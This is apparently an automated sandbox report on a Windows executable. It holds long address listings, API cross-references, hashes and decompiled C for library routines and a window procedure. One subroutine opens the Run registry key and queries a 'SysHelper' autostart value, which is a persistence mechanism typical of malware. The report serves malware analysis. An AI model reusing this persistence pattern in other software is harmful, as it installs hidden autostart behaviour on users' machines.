0x00463bbb
0x00463bbc
0x00463bbd
0x00463bbe
0x00463bbf
0x00463bc0
0x00463bcc
0x00463bd1
0x00463bd3
0x00463bf1
0x00463bfb
0x00463c00
0x00463c04
0x00463c08
0x00463c0c
0x00463c10
0x00463c11
0x00463c19
0x00463c25
0x00463bd5
0x00463be5
0x00463bed
0x00463bf0
0x00463bf0
0x00463693
0x00463695
0x004636aa
0x004636af
0x004636b4
0x00000000
0x004636b6
0x004636b6
0x004636bd
0x004636c0
0x004636c0
0x004636c2
0x004636c3
0x004636c7
0x004636da
0x004636df
0x004636e4
0x0046373e
0x00463743
0x00463746
0x00463748
0x00463767
0x0046376c
0x0046376f
0x00463776
0x0046377b
0x00463780
0x00463785
0x00463788
0x0046378a
0x004637b2
0x004637c2
0x004637c4
0x004637c7
0x004637c9
0x0046388c
0x0046388c
0x0046388c
0x00000000
0x004637cf
0x004637cf
0x004637cf
0x004637d1
0x004637d1
0x004637d9
0x00000000
0x00000000
0x004637db
0x004637db
0x004637dc
0x00000000
0x00000000
0x00000000
0x004637dc
0x004637d1
0x004637de
0x004637de
0x004637e6
0x004637e9
0x004637ef
0x00000000
0x004637f5
0x004637f5
0x004637fd
0x00463805
0x00000000
0x0046380b
0x0046380b
0x00463816
0x0046381b
0x0046381e
0x00463820
0x004638bd
0x00000000
0x00463826
0x00463835
0x0046383a
0x0046383d
0x0046383f
0x004638b2
0x004638b6
0x0046388e
0x00463894
0x0046389c
0x004638a1
0x004638a4
0x004638a6
0x004638ca
0x004638cd
0x004638cf
0x00463ace
0x00463ad0
0x00463ad4
0x00463ad6
0x00000000
0x004638d5
0x004638e8
0x004638ea
0x004638ed
0x004638ef
0x004639c4
0x004639c4
0x004639c8
0x004639c8
0x004639cc
0x004639cf
0x004639cf
0x004639d2
0x004639d2
0x004639d4
0x004639d5
0x004639d5
0x004639e2
0x004639ea
0x004639ef
0x004639f2
0x004639f4
0x00463b5d
0x00463b5d
0x00463b62
0x00463b67
0x00000000
0x004639fa
0x00463a06
0x00463a0b
0x00463a0e
0x00463a10
0x00000000
0x00463a16
0x00463a27
0x00463a2c
0x00463a2f
0x00463a31
0x00000000
0x00463a37
0x00463a3c
0x00463a41
0x00463a45
0x00463a4c
0x00463a4d
0x00463a4e
0x00463a53
0x00463a54
0x00463a59
0x00463a5c
0x00463a5e
0x00463af1
0x00463af6
0x00463af9
0x00463afb
0x00463b12
0x00463b12
0x00463b16
0x00463b1a
0x00000000
0x00463b20
0x00463b28
0x00463b31
0x00463b33
0x00463b3a
0x00463b40
0x00463b42
0x00463b48
0x00463b4e
0x00463b53
0x00463b56
0x00463afd
0x00463afd
0x00463b02
0x00463b07
0x00000000
0x00463b07
0x00463a64
0x00463a64
0x00463a69
0x00463a6e
0x00000000
0x00463a6e
0x00463a5e
0x00463a31
0x00463a10
0x00000000
0x004638f5
0x004638f5
0x004638f7
0x004638f9
0x004638f9
0x00463900
0x00463900
0x00463908
0x00000000
0x00000000
0x0046390a
0x0046390a
0x0046390b
0x00000000
0x00000000
0x00000000
0x0046390b
0x00463900
0x0046390d
0x0046390d
0x00463915
0x00463918
0x0046391e
0x00000000
0x00463924
0x00463924
0x00463927
0x00463936
0x00463946
0x0046394b
0x0046394e
0x00463950
0x00000000
0x00463952
0x00463952
0x00463955
0x00000000
0x00463957
0x00463962
0x00463967
0x0046396a
0x0046396c
0x00463ac0
0x00000000
0x00463972
0x00463983
0x0046398b
0x00463994
0x00463999
0x004639a4
0x004639a8
0x004639a9
0x004639aa
0x004639ac
0x00463a75
0x00463a7d
0x00463a82
0x00463a85
0x00463a87
0x00000000
0x00463a90
0x00463a90
0x00463a90
0x00463a98
0x00000000
0x00000000
0x00463a9a
0x00463a9a
0x00463a9b
0x00000000
0x00000000
0x00000000
0x00463a9b
0x00463a9d
0x00463aa5
0x00463aa8
0x00463aad
0x00000000
0x00463ab3
0x00463ab3
0x00000000
0x00463ab3
0x00463aad
0x00000000
0x00000000
0x00000000
0x004639ac
0x0046396c
0x00463955
0x00463950
0x00000000
0x004639b2
0x004639b7
0x004639b9
0x004639bc
0x004639bc
0x00000000
0x004638f9
0x004638ef
0x004638a8
0x004638a8
0x00000000
0x004638a8
0x00000000
0x00000000
0x00000000
0x0046383f
0x00463820
0x00463805
0x00000000
0x00463841
0x00463854
0x00463867
0x00463873
0x00463875
0x0046387f
0x00463881
0x00463884
0x00463884
0x00000000
0x004637cf
0x0046378c
0x0046378c
0x00463791
0x00463791
0x00463796
0x00463798
0x0046379a
0x0046379c
0x004637a1
0x00000000
0x004637a1
0x0046374a
0x0046374a
0x0046374f
0x00463754
0x00463710
0x00463710
0x00463712
0x00463714
0x00463719
0x00463719
0x0046371c
0x0046371d
0x00463726
0x0046372c
0x00463731
0x00463b98
0x00463b9a
0x00463ba1
0x00463ba2
0x00463ba4
0x00463bb2
0x00463bb2
0x00000000
0x00000000
0x00000000
0x004636e4
0x004636b4
0x00000000
0x004636e6
0x004636f4
0x004636f9
0x004636fc
0x004636fc
0x00000000
0x00463666
0x00463660
0x00000000

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

, xrefs: 00463A90
-----BEGIN , xrefs: 004636A4
.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----END , xrefs: 0046382F, 00463940, 004639E4
-----, xrefs: 004636D4, 00463A21

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Uniqueness

Uniqueness Score: -1.00%

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00425A97(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E00428C96(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E00428C96(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00428C96(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E004255AC( *_t42, 0x50aae8);
								_t15 = E00425E97(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E00420BED();
									E0042453C( *_t42);
									E004243E2( *_t42);
									E00420BED(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00424BDD(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E00420BED( *_t42);
							E00420BED(_t42);
							L8:
							goto L3;
						}
						E00420BED(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00425208(_t48))) = 0xc;
					goto L4;
				}
			}

0x00425aa0
0x00425ac6
0x00000000
0x00425aa8
0x00425ab3
0x00425ab7
0x00425ab9
0x00425ad2
0x00425ad7
0x00425adb
0x00425add
0x00425aee
0x00425af3
0x00425af8
0x00425afa
0x00425b13
0x00425b20
0x00425b28
0x00425b2b
0x00425b2d
0x00425b42
0x00425b42
0x00425b49
0x00425b50
0x00425b56
0x00425b5e
0x00425b67
0x00000000
0x00425b67
0x00425b31
0x00425b34
0x00425b3b
0x00425b3d
0x00425b65
0x00000000
0x00425b65
0x00425b3f
0x00000000
0x00425b3f
0x00425afe
0x00425b04
0x00425ae5
0x00000000
0x00425ae5
0x00425ae0
0x00000000
0x00425ae0
0x00425abb
0x00425ac0
0x00000000
0x00425ac0

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041BAE0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				char _v28;
				char _v32;
				char _v48;
				char _v2316;
				char _v2320;
				long _v2328;
				int _v2332;
				short _v2348;
				long _v2352;
				int _v2356;
				char _v2364;
				short _v2372;
				char _v2376;
				int _v2392;
				int _v2396;
				long _v2408;
				int _v2412;
				int _v2416;
				short _v2428;
				char _v2432;
				char _v2436;
				signed int _v2440;
				char _v2444;
				signed int _v2456;
				void* _v2460;
				signed int _v2468;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t100;
				intOrPtr* _t101;
				long _t102;
				void* _t111;
				long _t117;
				void* _t125;
				void* _t128;
				void* _t136;
				intOrPtr _t140;
				long _t141;
				long _t150;
				intOrPtr* _t151;
				long _t152;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t158;
				void* _t161;
				int _t164;
				intOrPtr* _t165;
				signed int _t170;
				short* _t171;
				short* _t172;
				intOrPtr* _t176;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				DWORD* _t194;
				struct HWND__* _t195;
				struct HWND__* _t203;
				intOrPtr _t206;
				intOrPtr _t208;
				signed int _t211;
				signed int _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				short* _t218;
				short* _t219;
				void* _t221;

				_t212 = _t211 & 0xfffffff8;
				_t164 = _a8;
				_push(0xffffffff);
				_push(0x4cb187);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t212;
				_t213 = _t212 - 0x978;
				_push(_t158);
				_push(_t191);
				_t221 = _t164 - 0x8001;
				if(_t221 > 0) {
					_t100 = _t164 - 0x8003;
					__eflags = _t100;
					if(_t100 == 0) {
						_t165 =  *0x513268;
						_t101 =  *_t165;
						__eflags = _t101 - _t165;
						if(_t101 == _t165) {
							L46:
							__eflags =  *0x52923c;
							if( *0x52923c != 0) {
								goto L50;
							} else {
								goto L47;
							}
						} else {
							while(1) {
								__eflags =  *((char*)(_t101 + 0xd));
								if( *((char*)(_t101 + 0xd)) != 0) {
									break;
								}
								_t101 =  *_t101;
								__eflags = _t101 - _t165;
								if(_t101 != _t165) {
									continue;
								} else {
									goto L46;
								}
								goto L51;
							}
							L50:
							_t102 = DefWindowProcW(_a4, 0x8003, _a12, _a16);
							 *[fs:0x0] = _v16;
							return _t102;
						}
					} else {
						__eflags = _t100 == 1;
						if(_t100 == 1) {
							_v2408 = 0x400;
							_t205 = E00420C62(_t158, _t187, _t191, 0x800);
							GetComputerNameW(_t107,  &_v2408);
							_v2412 = 7;
							_v2416 = 0;
							_v2432 = 0;
							_v8 = 0;
							_t111 = E00413100( &_v2348, _t191, L"\\\\");
							_v12 = 1;
							_t194 = E0041CE80( &_v2376, _t111, _t205);
							_t215 = _t213 + 8;
							__eflags =  &_v2436 - _t194;
							if( &_v2436 != _t194) {
								__eflags = 0;
								_v2412 = 7;
								_v2416 = 0;
								_v2432 = 0;
								E004145A0( &_v2432, _t194);
							}
							__eflags = _v2352 - 8;
							if(_v2352 >= 8) {
								L00422587(_v2372);
								_t215 = _t215 + 4;
							}
							_v2352 = 7;
							_v8 = 0;
							__eflags = _v2328 - 8;
							_v2356 = 0;
							_v2372 = 0;
							if(_v2328 >= 8) {
								L00422587(_v2348);
								_t215 = _t215 + 4;
							}
							_v2328 = 7;
							_v2332 = 0;
							_v2348 = 0;
							E00420BED(_t205);
							_t206 =  *0x529240; // 0x0
							_t170 = 0;
							_t216 = _t215 + 4;
							_v2440 = 0;
							__eflags = _t206 -  *0x529244; // 0x0
							if(__eflags == 0) {
								L37:
								_t195 = _a4;
								_t208 =  *((intOrPtr*)( *0x513268));
								_t117 = IsWindow(_t195);
								__eflags = _t117;
								if(_t117 != 0) {
									__eflags =  *(_t208 + 0x8c8);
									if( *(_t208 + 0x8c8) <= 0) {
										 *0x529224 = 1;
										DestroyWindow(_t195);
									}
								}
							} else {
								_t40 = _t206 + 0x28; // 0x28
								_t161 = _t40;
								do {
									__eflags =  *((intOrPtr*)(_t161 - 0x24)) - 1;
									if( *((intOrPtr*)(_t161 - 0x24)) == 1) {
										__eflags =  *((intOrPtr*)(_t161 - 0x20)) - 3;
										if( *((intOrPtr*)(_t161 - 0x20)) == 3) {
											_t218 = _t216 - 0x18;
											_t171 = _t218;
											_v2436 = _t218;
											_push(0xffffffff);
											 *((intOrPtr*)(_t171 + 0x14)) = 7;
											 *(_t171 + 0x10) = 0;
											_push(0);
											 *_t171 = 0;
											E00414690(_t161, _t171,  &_v2432);
											_t219 = _t218 - 0x18;
											_v20 = 2;
											_t172 = _t219;
											_push(0xffffffff);
											_push(0);
											 *((intOrPtr*)(_t172 + 0x14)) = 7;
											 *(_t172 + 0x10) = 0;
											 *_t172 = 0;
											E00414690(_t161, _t172, _t161);
											_v32 = 0;
											_t125 = E0040EFF0(0);
											_t216 = _t219 + 0x30;
											__eflags = _t125 - 0xffffffff;
											if(_t125 != 0xffffffff) {
												_t170 = _v2456;
											} else {
												_v2396 = 0;
												_v2392 = 0;
												E0041C330(_t194, _t206,  &_v2396);
												_t128 = E00419D10( &_v2316);
												_v28 = 3;
												E0041C240(_t194, _t206, _t128);
												_v32 = 0;
												E0041B680( &_v2320);
												_t176 =  *0x513268;
												_t131 =  *_t176;
												_t197 =  *((intOrPtr*)(_t176 + 4)) + 8;
												_v2460 =  *((intOrPtr*)(_t176 + 4)) + 8;
												 *((intOrPtr*)(_t131 + 0x8c8)) =  *((intOrPtr*)( *_t176 + 0x8c8)) + 1;
												E0041B8B0(_t161, _t197, _t131 + 8);
												_v2412 = 7;
												_push(0xffffffff);
												_push(0);
												_v2416 = 0;
												_v2432 = 0;
												E00414690(_t161,  &_v2432, _t161);
												_v48 = 4;
												_t136 = E0041CE80( &_v2364,  &_v2444, "\\");
												_t216 = _t216 + 4;
												E004131D0(_t197 + 0x8a4, _t136);
												__eflags = _v2348 - 8;
												if(_v2348 >= 8) {
													L00422587(_v2348);
													_t216 = _t216 + 4;
												}
												_v2328 = 7;
												_v32 = 0;
												__eflags = _v2408 - 8;
												_v2332 = 0;
												_v2348 = 0;
												if(_v2408 >= 8) {
													L00422587(_v2428);
													_t216 = _t216 + 4;
												}
												_v2408 = 7;
												_v2428 = 0;
												_t140 =  *0x529228; // 0x82ce58
												_v2412 = 0;
												_t194 =  *((intOrPtr*)(_t140 + 4)) + 8;
												_t141 = CreateThread(0, 0, E0041F130, _v2460, 0, _t194);
												__eflags = _t141;
												_t194[1] = _t141;
												_t170 =  !=  ? 1 : _v2468 & 0x000000ff;
												_v2468 = _t170;
											}
										}
									}
									_t206 = _t206 + 0x70;
									_t161 = _t161 + 0x70;
									__eflags = _t206 -  *0x529244; // 0x0
								} while (__eflags != 0);
								__eflags = _t170;
								if(_t170 == 0) {
									goto L37;
								}
							}
							__eflags = _v2412 - 8;
							if(_v2412 >= 8) {
								L00422587(_v2432);
							}
							goto L49;
						} else {
							goto L15;
						}
					}
				} else {
					if(_t221 == 0) {
						_t185 =  *0x513268;
						_t151 =  *_t185;
						__eflags = _t151 - _t185;
						if(_t151 == _t185) {
							goto L49;
						} else {
							while(1) {
								__eflags =  *((char*)(_t151 + 0xd));
								if( *((char*)(_t151 + 0xd)) != 0) {
									_t152 = DefWindowProcW(_a4, 0x8001, _a12, _a16);
									 *[fs:0x0] = _v16;
									return _t152;
								}
								_t151 =  *_t151;
								__eflags = _t151 - _t185;
								if(_t151 != _t185) {
									continue;
								} else {
									goto L49;
								}
								goto L51;
							}
						}
					} else {
						_t154 = _t164 - 2;
						if(_t154 == 0) {
							PostQuitMessage(0);
							L49:
							 *[fs:0x0] = _v16;
							return 0;
						} else {
							_t155 = _t154 - 0xf;
							if(_t155 == 0) {
								goto L49;
							} else {
								_t156 = _t155 - 5;
								if(_t156 != 0) {
									L15:
									_t150 = DefWindowProcW(_a4, _t164, _a12, _a16);
									 *[fs:0x0] = _v16;
									return _t150;
								} else {
									if(_a12 != _t156) {
										E00411CD0(_t158, 0, _t156);
										L47:
										_t203 = _a4;
										if(IsWindow(_t203) != 0) {
											 *0x529224 = 1;
											DestroyWindow(_t203);
										}
									}
									goto L49;
								}
							}
						}
					}
				}
				L51:
			}

0x0041bae3
0x0041baec
0x0041baef
0x0041baf1
0x0041baf6
0x0041baf7
0x0041bafe
0x0041bb04
0x0041bb06
0x0041bb07
0x0041bb0d
0x0041bba2
0x0041bba2
0x0041bba7
0x0041bf3d
0x0041bf43
0x0041bf45
0x0041bf47
0x0041bf5c
0x0041bf5c
0x0041bf63
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf50
0x0041bf50
0x0041bf50
0x0041bf54
0x00000000
0x00000000
0x0041bf56
0x0041bf58
0x0041bf5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf5a
0x0041bf9a
0x0041bfa8
0x0041bfb7
0x0041bfc2
0x0041bfc2
0x0041bbad
0x0041bbad
0x0041bbae
0x0041bbdc
0x0041bbec
0x0041bbf4
0x0041bbfc
0x0041bc04
0x0041bc0c
0x0041bc1a
0x0041bc21
0x0041bc29
0x0041bc3a
0x0041bc3c
0x0041bc43
0x0041bc45
0x0041bc5a
0x0041bc5c
0x0041bc69
0x0041bc71
0x0041bc76
0x0041bc76
0x0041bc7b
0x0041bc80
0x0041bc86
0x0041bc8b
0x0041bc8b
0x0041bc90
0x0041bc98
0x0041bc9f
0x0041bca4
0x0041bcac
0x0041bcb1
0x0041bcb7
0x0041bcbc
0x0041bcbc
0x0041bcc1
0x0041bcca
0x0041bcd2
0x0041bcd7
0x0041bcdc
0x0041bce2
0x0041bce4
0x0041bce7
0x0041bceb
0x0041bcf1
0x0041befb
0x0041bf01
0x0041bf05
0x0041bf07
0x0041bf0d
0x0041bf0f
0x0041bf11
0x0041bf18
0x0041bf1b
0x0041bf22
0x0041bf22
0x0041bf18
0x0041bcf7
0x0041bcf7
0x0041bcf7
0x0041bd00
0x0041bd00
0x0041bd04
0x0041bd0a
0x0041bd0e
0x0041bd14
0x0041bd19
0x0041bd1b
0x0041bd1f
0x0041bd21
0x0041bd28
0x0041bd2f
0x0041bd30
0x0041bd38
0x0041bd3d
0x0041bd40
0x0041bd48
0x0041bd4c
0x0041bd4e
0x0041bd4f
0x0041bd56
0x0041bd5e
0x0041bd61
0x0041bd68
0x0041bd70
0x0041bd75
0x0041bd78
0x0041bd7b
0x0041bee1
0x0041bd81
0x0041bd85
0x0041bd8e
0x0041bd96
0x0041bda2
0x0041bda8
0x0041bdb0
0x0041bdbc
0x0041bdc4
0x0041bdc9
0x0041bdcf
0x0041bdd4
0x0041bdd9
0x0041bddd
0x0041bde7
0x0041bdee
0x0041bdf6
0x0041bdf8
0x0041bdfe
0x0041be06
0x0041be0b
0x0041be19
0x0041be28
0x0041be2d
0x0041be37
0x0041be3c
0x0041be44
0x0041be4d
0x0041be52
0x0041be52
0x0041be57
0x0041be62
0x0041be69
0x0041be6e
0x0041be79
0x0041be81
0x0041be87
0x0041be8c
0x0041be8c
0x0041be91
0x0041be99
0x0041be9e
0x0041bea3
0x0041beae
0x0041bec1
0x0041becb
0x0041becd
0x0041bed8
0x0041bedb
0x0041bedb
0x0041bd7b
0x0041bd0e
0x0041bee5
0x0041bee8
0x0041beeb
0x0041beeb
0x0041bef7
0x0041bef9
0x00000000
0x00000000
0x0041bef9
0x0041bf28
0x0041bf2d
0x0041bf33
0x0041bf38
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bbae
0x0041bb13
0x0041bb13
0x0041bb54
0x0041bb5a
0x0041bb5c
0x0041bb5e
0x00000000
0x00000000
0x0041bb64
0x0041bb64
0x0041bb68
0x0041bb83
0x0041bb90
0x0041bb9d
0x0041bb9d
0x0041bb6a
0x0041bb6c
0x0041bb6e
0x00000000
0x0041bb70
0x00000000
0x0041bb70
0x00000000
0x0041bb6e
0x0041bb64
0x0041bb15
0x0041bb17
0x0041bb1a
0x0041bb49
0x0041bf81
0x0041bf8a
0x0041bf97
0x0041bb1c
0x0041bb1c
0x0041bb1f
0x00000000
0x0041bb25
0x0041bb25
0x0041bb28
0x0041bbb0
0x0041bbba
0x0041bbc7
0x0041bbd4
0x0041bb2e
0x0041bb31
0x0041bb3a
0x0041bf65
0x0041bf65
0x0041bf71
0x0041bf74
0x0041bf7b
0x0041bf7b
0x0041bf71
0x00000000
0x0041bb31
0x0041bb28
0x0041bb1f
0x0041bb1a
0x0041bb13
0x00000000

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32 ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID:
API String ID: 3873257347-0
Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00425B6E Relevance: 18.1, APIs: 12, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00425B6E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E004295C3(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004242FD(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x507ab0);
					E00428520(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E00425007();
						_v36 = _t88;
						E004245DC(0, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E00428C96(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00428AF7(0xc);
							_v8 = 1;
							E004255AC(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E00425CE3();
							_t66 = E00425E97(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0042453C(_t83);
								_t43 = E004243E2(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00437413(_a8, 0x50a97c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x510434 = 1;
									}
								}
								E00428AF7(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0042465C(_t25, _t83);
								E0042453C(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x50aba8 & 0x00000001;
									if(( *0x50aba8 & 0x00000001) == 0) {
										E0042465C(0x50aae4,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x50aae4; // 0x50aae8
										_t32 = _t77 + 0x84; // 0x50b030
										 *0x50b028 =  *_t32;
										_t33 = _t77 + 0x90; // 0x4d0da8
										 *0x50b084 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x50a978 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00425CF2();
							}
						}
						_v8 = 0xfffffffe;
						E00425D25(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
						E004242D2();
						_t45 = 0;
					}
					return E00428565(_t45);
				}
				L20:
			}

0x00425b6e
0x00425b71
0x00425b74
0x00425b75
0x00425b7a
0x00425b9e
0x00425ba1
0x00425b7c
0x00425b7c
0x00425b7d
0x00425b80
0x00425b80
0x00425b8b
0x00425b90
0x00425b95
0x00000000
0x00000000
0x00425b97
0x00425b9b
0x00000000
0x00425b9d
0x00000000
0x00425b9d
0x00000000
0x00425b9b
0x00425ba2
0x00425ba3
0x00425ba4
0x00425ba5
0x00425ba6
0x00425ba7
0x00425bac
0x00425bad
0x00425baf
0x00425bb4
0x00425bb9
0x00425bbb
0x00425bbe
0x00425bc2
0x00425be0
0x00425be2
0x00425be5
0x00425bea
0x00425bee
0x00425bff
0x00425c01
